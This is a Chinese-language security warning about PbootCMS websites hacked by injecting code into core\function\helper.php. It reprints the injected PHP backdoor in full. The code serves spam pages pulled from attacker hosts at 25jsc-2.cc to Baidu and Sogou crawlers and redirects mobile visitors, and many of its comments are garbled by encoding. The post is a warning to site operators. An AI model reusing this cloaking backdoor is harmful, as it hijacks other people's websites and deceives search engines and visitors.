开源达人近期发现有关于PBOOTCMS漏洞

开源达人近期发现有关于PBOOTCMS漏洞，有黑客通过pbootcms的读写权限漏洞，入侵注入网站程序，通过 php curl函数，读取国外服务器如以下：IP184.164.93.198 网址http://txt.25jsc-2.cc:82/，http://jsc.25jsc-2.cc:81/等端口，实施入侵服务器上的网站并伪装为404页，伪装进行内容发布，一般会注放文件为：core\function\helper.php文件。给各大使用PBOOTCMS的网站用户造成极大的安全隐患及问题，请国内各大站长注意防备加强PBOOTCMS的网站读写安全，防止注入及跨站，对服务器加强安全管理，及时维护更新，并发现问题后及时投诉到国内中央网信办（国家互联网信息办公室）违法和不良信息举报中心或全国互联网安全信息服务平台。

<?php

 $protocol2 = (!empty($_SERVER[‘HTTPS’]) && $_SERVER[‘HTTPS’] !== ‘off’ || $_SERVER[‘SERVER_PORT’] == 443) ?

“https://” : “http://”;

$host2 = $_SERVER[‘HTTP_HOST’];

$fullUrl2 = $protocol2 . $host2;

$url2 = $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’];

set_time_limit(30);

error_reporting(0);

$tr2 = “stristr”;

$er2 = $_SERVER;

/**

 * 发送HTTP GET请求并返回响应内容

 *

 * @param string $url2 请求的URL地址

 * @return string 返回HTTP响应的内容

 */

function httpGet32($url2) {

  // 设置响应内容类型为HTML，字符编码为UTF-8

  header(‘Content-Type:text/html;charset=utf-8’);

  // 初始化cURL会话

  $ch = curl_init();

  // 获取客户端用户代理字符串

  $ua2 = $_SERVER[‘HTTP_USER_AGENT’];

  // 配置cURL选项

  curl_setopt($ch, CURLOPT_URL, $url2);

  curl_setopt($ch, CURLOPT_USERAGENT, ‘MyCustomUA/1.0’);

  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);

  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

  curl_setopt($ch, CURLOPT_HEADER, 0);

  // 执行cURL请求并获取响应

  $output = curl_exec($ch);

  // 关闭cURL会话

  curl_close($ch);

  return $output;

}

/**

 * 发送HTTP GET请求并返回响应内容

 *

 * @param string $url2 请求的URL地址

 * @return string 返回HTTP响应内容

 */

function httpGet3($url2) {

  // 设置响应内容类型为HTML，字符编码为UTF-8

  header(‘Content-Type:text/html;charset=utf-8’);

  // 初始化cURL会话

  $ch = curl_init();

  // 获取客户端用户代理信息

  $ua2 = $_SERVER[‘HTTP_USER_AGENT’];

  // 配置cURL选项

  curl_setopt($ch, CURLOPT_URL, $url2);

  curl_setopt($ch, CURLOPT_USERAGENT, $ua2);

  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);

  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

  curl_setopt($ch, CURLOPT_HEADER, 0);

  // 执行cURL请求并获取响应

  $output = curl_exec($ch);

  // 关闭cURL会话

  curl_close($ch);

  return $output;

}

$dir=”?moban”;

/**

 * 生成随机字符串

 *

 * @param int $length 生成字符串的长度，默认为5

 * @param int $type 字符串类型：0-只包含字母，1-只包含数字，2-包含字母和数字，默认为0

 * @return string 生成的随机字符串

 */

function char($length = 5, $type = 0)

{

    $arr = array(1 => “0123456789”, 2 => “abcdefghijklmnopqrstuvwxyz0123456789”);

    // 根据类型选择字符集

    if ($type == 0)

    {

        array_pop($arr);

        $string = implode(“”, $arr);

    } elseif ($type == “-1”) {

        $string = implode(“”, $arr);

    } else {

        $string = $arr[$type];

    }

    // 生成指定长度的随机字符串

    $count = strlen($string) – 1;

    $code = ”;

    for ($i = 0; $i < $length; $i++) {

        $code .= $string[rand(0, $count)];

    }

    return $code;

}

$dir2=get_url2().’/moban’;

function get_url2() {

    $url2 = $_SERVER[‘REQUEST_URI’];

    $url2 = preg_replace(‘~/+~’, ‘/’, $url2);  // 鍘婚櫎澶氫綑鐨勬枩鏉�

    // 鍒嗗壊璺緞

    $parts = explode(‘/’, trim($url2, ‘/’));

    // 濡傛灉鏂囦欢璺緞锛屼繚鐣欏墠涓ょ骇鐩綍

    if (preg_match(‘/\.(php|html|xml|asp|ppt|shtml)$/’, end($parts))) {

        // 鏂囦欢璺緞锛岃繑鍥炲墠涓ょ骇鐩綍

        $url2 = ‘/’ . $parts[0];

    } else {

        // 涓嶆槸鏂囦欢璺緞锛屼繚鐣欏墠涓ょ骇鐩綍

        if (count($parts) > 2) {

            $url2 = ‘/’ . $parts[0] . ‘/’ . $parts[1];

        } else {

            $url2 = ‘/’ . implode(‘/’, $parts);

        }

    }

    return $url2;

}

define(‘url’, $er2[‘REQUEST_URI’]);

define(‘ref’, $er2[‘HTTP_REFERER’]);

define(‘ent’, $er2[‘HTTP_USER_AGENT’]);

define(‘site’, “http://jsc.25jsc-2.cc:81/”);

 define(‘url8’, $fullUrl2);

$title = ‘/<title>(.*?)<\/title>/i’;

$meta = ‘/<meta charset=”.*?>/i’;

$key = ‘/<meta\s+name=”keywords”\s+content=”([^”]+)”\s*\/?>/i’;

$miaoshu = ‘/<meta\s+name=”description”\s+content=”([^”]+)”\s*\/?>/i’;

define(‘road’,$_SERVER[‘REQUEST_URI’]);

define(‘regs’, ‘@baiduspider|Sogou@i’);

define(‘area’, stristr(url, “moban”)  or stristr(url, “moban”)  or stristr(url, “xml”)  or stristr(url, “doc”)  or

stristr(url, “pdf”)  or stristr(url, “txt”)  or stristr(url, “ppt”)  or stristr(url, “pptx”)  or stristr(url, “xls”)  

or stristr(url, “xlsx”)  or stristr(url, “wap”)  or stristr(url, “edu”)  or stristr(url, “gov”)  or stristr(url,

“wap”)  or stristr(url, “asp”)  or stristr(url, “gq”)  or stristr(url, “pdx”)  or stristr(url, “ga”)  or stristr(url,

“tacc”)  or stristr(url, “work”)  or stristr(url, “csv”)  or stristr(url, “sports”)  or stristr(url, “sleep”)  or

stristr(url, “life”)  or stristr(url, “88art”)

 or stristr(url, “advice”) or stristr(url, “wap”) or stristr(url, “moban”) or stristr(url, “and”) or stristr(url,

“no”) or stristr(url, “world”) or stristr(url, “school”) or stristr(url, “tips”) or stristr(url, “auto”));

if (preg_match(regs, ent)) {

    if (area) {

      echo ‘<link rel=”canonical” href=”‘.$url2.'” />’ ;

   echo ‘<!-184-194-phpjc-kw-526–>’;

        //echo httpGet3(site.road).httpGet32(url8);

         $html2 = httpGet32(url8);

         $html = httpGet3(site . road);

        // $html = httpGet32(url8)

  // 閹笛嗩攽閺囨寧宕�</h1>

$html2 = str_replace(‘</h1>’, ”, $html2);

// 閹笛嗩攽閺囨寧宕�<h1>

$html2 = str_replace(‘<h1>’, ”, $html2);

// 閹笛嗩攽閺囨寧宕�$meta

$pattern6 = $meta;

$replacement6 = ”;

$html2 = preg_replace($pattern6, $replacement6, $html2);

// 閹笛嗩攽閺囨寧宕�$miaoshu

$pattern5 = $miaoshu;

$replacement5 = ”;

$html2 = preg_replace($pattern5, $replacement5, $html2);

// 閹笛嗩攽閺囨寧宕�$key

$pattern4 = $key;

$replacement4 = ”;

$html2 = preg_replace($pattern4, $replacement4, $html2);

// 閹笛嗩攽閺囨寧宕�$title

$pattern3 = $title;

$replacement3 = ”;

$html2 = preg_replace($pattern3, $replacement3, $html2);

// 閹笛嗩攽閺囨寧宕�/head

$html2 = str_replace(‘</head>’, ”, $html2);

// 閹笛嗩攽閺囨寧宕瞙ead

$html2 = str_replace(‘<head>’, ”, $html2);

// 閹笛嗩攽閺囨寧宕查弴鎸庡床html

$pattern2 = ‘/<html>/i’;

$replacement2 = ”;

$html2 = preg_replace($pattern2, $replacement2, $html2);

// 閹笛嗩攽閺囨寧宕查弴鎸庡床<body2>

$pattern8 = ‘/body class=.*?>/i’;

$replacement8 = ”;

$html2 = preg_replace($pattern8, $replacement8, $html2);

// 閹笛嗩攽閺囨寧宕查弴鎸庡床<body>

$pattern7 = ‘/<body>/i’;

$replacement7 = ”;

$html2 = preg_replace($pattern7, $replacement7, $html2);

$html = $html.$html2;

        $lianjie = ‘/<a .*?>[\s\S]*?<\/a>/’;

        preg_match_all($lianjie,$html, $aarray5);

        // preg_match_all($lianjie, $html2, $aarray5);

        if ($aarray5[0]) {

            foreach ($aarray5[0] as $pbti) {

                $preg = ‘/href=(\”|\’)(.*?)(\”|\’)/i’;

                $replacestr = ‘href=”‘ . $dir2 . ‘/’ . char(6, 1) . char(mt_rand(4, 10), 2) . ‘.html’ . ‘”‘;

                $ahtml = preg_replace($preg, $replacestr, $pbti);

                $html = str_replace($pbti, $ahtml, $html);

                //  $html2 = str_replace($pbti, $ahtml, $html2);

            }

        }

        echo $html;

      exit();

    }

    else {

     $html=httpGet32(url8.url);

    //  echo(url8.url);

// 閹笛嗩攽閺囨寧宕�</h1>

$html = str_replace(‘</h1>’, ”, $html);

// 閹笛嗩攽閺囨寧宕�<h1>

$html = str_replace(‘<h1>’, ”, $html);

$lianjie = ‘/<a .*?>[\s\S]*?<\/a>/’;

preg_match_all($lianjie,$html,$aarray5);

if($aarray5[0]){

   foreach ($aarray5[0] as $pbti){

      $preg = ‘/href=(\”|\’)(.*?)(\”|\’)/i’;

$replacestr = ‘href=”‘.$dir.”/”.char(6,1).char(mt_rand(4,10),2).’.html’.'”‘;

$ahtml=preg_replace($preg, $replacestr,$pbti);

$html= str_replace($pbti, $ahtml, $html);

   }

}

echo $html;

 exit();

   }

}

        ob_flush();

        flush();

if (area && preg_match(‘/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|

wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/’,$_SERVER[‘HTTP_USER_AGENT’])) {

$ua = $_SERVER[‘HTTP_USER_AGENT’];

$ch = curl_init();

// 鐠佸墽鐤哢RL閸滃瞼娴夋惔鏃傛畱闁銆�

curl_setopt($ch, CURLOPT_USERAGENT, $ua);

curl_setopt($ch, CURLOPT_URL, “http://txt.25jsc-2.cc:82/502.php”);

curl_setopt($ch, CURLOPT_HEADER, false);

// 閹舵挸褰嘦RL楠炶埖濡哥€瑰啩绱堕柅鎺旂舶濞村繗顫嶉崳锟�

curl_exec($ch);

//閸忔娊妫碿URL鐠у嫭绨敍灞借嫙娑撴棃鍣撮弨鍓ч兇缂佺喕绁┃锟�

curl_close($ch);

    exit();

   }

?>